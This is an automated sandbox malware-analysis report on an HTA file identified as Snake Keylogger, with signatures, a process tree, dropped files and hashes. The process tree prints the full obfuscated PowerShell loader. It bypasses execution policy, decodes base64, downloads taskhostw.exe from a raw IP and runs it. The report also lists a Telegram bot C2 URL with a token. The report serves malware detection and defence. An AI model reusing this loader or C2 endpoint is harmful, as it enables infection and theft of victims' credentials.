Overview

overview

10

Static

static

1

95e0020351...05.hta

windows7-x64

10

95e0020351...05.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    17-10-2024 02:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    95e002035116146de7fdf04b59845552552c7527b8bb3893abaf3a51d5061305.hta

  • Size

    129KB

  • MD5

    03140c0995d8db21fe4fb2f030322615

  • SHA1

    0199286b876a0d3e896b1830ff024555374e51f3

  • SHA256

    95e002035116146de7fdf04b59845552552c7527b8bb3893abaf3a51d5061305

  • SHA512

    9f2682368cd24bf210edf0ec6d286d016a89b5fba4649fdd76d18bdc7f1cbc4dfb079079d074756dbfcf6377c1e34d6b59664df6ca7a8e6770af2fce704e09f9

  • SSDEEP

    96:Eam780jLy6w80jLyrdUwSdffYJMK0jLyqx0jLyt0Aj5OtG80jLy987T:Ea280f7w80fCUpdWMK0fd0fX5A80fGCT

Score
10/10
snakekeyloggercollectiondefense_evasiondiscoveryexecutionkeyloggerstealer

Malware Config

Extracted

Family

snakekeylogger

C2

https://api.telegram.org/bot7913958792:AAFOhfKo5L7M50XG6odxxQQwJAeD3zGEuJU/sendMessage?chat_id=7004340450

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

    stealerkeyloggersnakekeylogger
  • Snake Keylogger payload 4 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
    defense_evasionexecution
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\95e002035116146de7fdf04b59845552552c7527b8bb3893abaf3a51d5061305.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1860
    • C:\Windows\SysWOW64\WInDoWspOwERsHell\v1.0\PowERShELL.Exe
      "C:\Windows\SYStEM32\WInDoWspOwERsHell\v1.0\PowERShELL.Exe" "POwersHelL -ex byPaSS -Nop -w 1 -c deViceCrEdeNtIAldepLoyMENt.exE ; Iex($(iEx('[sYStEM.TEXt.enCodInG]'+[cHaR]58+[chAr]0X3a+'UTf8.gETSTRInG([SYSTEm.COnVert]'+[ChaR]58+[ChAR]0X3A+'FroMbASE64strINg('+[ChAR]0X22+'JG44ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlckRFZklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1tVkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrd1pEdUhyU0osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6cUxySWYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUN1bGdiLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmlmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkp4dkVqQU9mV0RaIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ2V1USAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG44OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMjUvMjgwL3Rhc2tob3N0dy5leGUiLCIkRW52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtzVGFSdC1zTGVlUCgzKTtTVGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx0YXNraG9zdHcuZXhlIg=='+[chAR]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2332
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex byPaSS -Nop -w 1 -c deViceCrEdeNtIAldepLoyMENt.exE
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2112
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pkrkycbv.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2768
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9F3D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9F3C.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2800
      • C:\Users\Admin\AppData\Roaming\taskhostw.exe
        "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:2216
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
          4⤵
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:2960

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES9F3D.tmp
    Filesize

    1KB

    MD5

    7c35e8647a1569f4b7289eebaea66064

    SHA1

    63a28dc6743f1dbee9a48ac85dede9d64e5a853b

    SHA256

    b5574d52d19c7159084d9bc6e07b4b3771ea2a286f3feca72af862605731b3b5

    SHA512

    b0482caa7f70092714c3e7e037524f6e918e566adf88ac0fd648bbeebef4de420dca85529b282062dfbc53c6436fba2ec2821028d392c14338400ecde008d7d6

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\pkrkycbv.dll
    Filesize

    3KB

    MD5

    90da4c3402bf359fb597048f47e2af80

    SHA1

    bc2e77a8f72bcf31540892135e7148f9385105d8

    SHA256

    ebe1541f13b8eacb854f86156e909bbaa48350575a48944753ac915483e7461f

    SHA512

    2b48fed14de6ac2271d98e726064cceb33774f1d8014ee867f19de1efa60e32fce3693315134c6d1bf89a7d76fdc0f7f37afd4d180e386f6e02972432d934ca9

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\pkrkycbv.pdb
    Filesize

    7KB

    MD5

    4c0f61069e721e2ee75b4b0c185cb193

    SHA1

    7ea9a9a81e7a6367aed58c49151dfd58a2ea0435

    SHA256

    7bc6ec175829f2a3570a8d695488b942014381e6e8d643ed36c44cc93f416c94

    SHA512

    90fe2012047f7e14f6911311189a6c716b4a17f3459d605b503e17356e148e029c27297f27ac0d916471175143afa188ee9ebffbcd1aad2ca6645a422c27b7d7

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    fe5ead0b7070bcd47957eb37ebc8a1d4

    SHA1

    dab7a6f1cd08075acfe655094196661a58010dac

    SHA256

    afdcede4d25c7d7490ecf560e9e9834c08a1d3e719a82588f64cc10b55c10621

    SHA512

    2fc44574f557fe2dfbedd398e32d53483516dbedfb7370148877b5921d1d056e71716b9e823059598a3a3654fd4a8b91469f470a0c07fa13dc84e068252ed598

    Download Submit

  • C:\Users\Admin\AppData\Roaming\taskhostw.exe
    Filesize

    935KB

    MD5

    daaa8ac3995fb610eda2e52a639d191f

    SHA1

    2a26a631b79878c461248d5c03a33fb312aedb05

    SHA256

    e82aa9f8f95f53d306db35e28e6fdd4dd16eba7d7437971f929d3cf5470267b7

    SHA512

    808c18d514439aead5759bd3d1bfbfb1b31cfb6c03a147db8525aa8f7dec30fb4b73a12b4e4310f97b9917f6513594d917184434f49ff9a5ee1870c46ae75157

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC9F3C.tmp
    Filesize

    652B

    MD5

    e0bab0e85e98b66302c3e8dd5df289da

    SHA1

    6e7dfbc65eba887d2735179e6b09f012afe76f6a

    SHA256

    b8bd4332716de2eae7002a76e932fa3a6eb614381650d70710459010382014f6

    SHA512

    dd556d1dca37db9b62a952508080834feec98f6ebd345d9acaf05f8df402ada5fde4b76d78bfab892e18e3352ee58d569860ae770cbc6732e302f735d7e0da4c

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\pkrkycbv.0.cs
    Filesize

    474B

    MD5

    0e03065f874d09489b23d564815660e8

    SHA1

    005cc140f8d9ad68a7863aee4da445e466c98379

    SHA256

    9600c5f95e6b296008011163196ad864c684b50e172ea35f0ca140ce577c75f1

    SHA512

    a55b8c7d5656c0c854da908ecf6bcc64f9520b61ff21154aa548e01dbd69ffd762806c09b3ec331d94b23b6145b48e2e649ead07dab8d73a17bc2a6981800d10

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\pkrkycbv.cmdline
    Filesize

    309B

    MD5

    f1613223adb46d566af2bb8c3d62473a

    SHA1

    0d276355626d5944f04b1f2e9f462c14d542c5aa

    SHA256

    d712c25ae1327e78556aaa05678d120122be2c14dc45bb04b9048c4ffd058670

    SHA512

    e2d4353f4c2b3023c1779113f6db40ad2a48ef1df25dda1a3281634797af308b47312b23fd5f9ec9b02d775eaf5010b1731a82d789a8343406379cd8faac2a9d

    Download Submit

  • memory/2960-34-0x0000000000090000-0x00000000000B6000-memory.dmp

    Filesize

    152KB

    Download

  • memory/2960-42-0x0000000000090000-0x00000000000B6000-memory.dmp

    Filesize

    152KB

    Download

  • memory/2960-39-0x0000000000090000-0x00000000000B6000-memory.dmp

    Filesize

    152KB

    Download

  • memory/2960-35-0x0000000000090000-0x00000000000B6000-memory.dmp

    Filesize

    152KB

    Download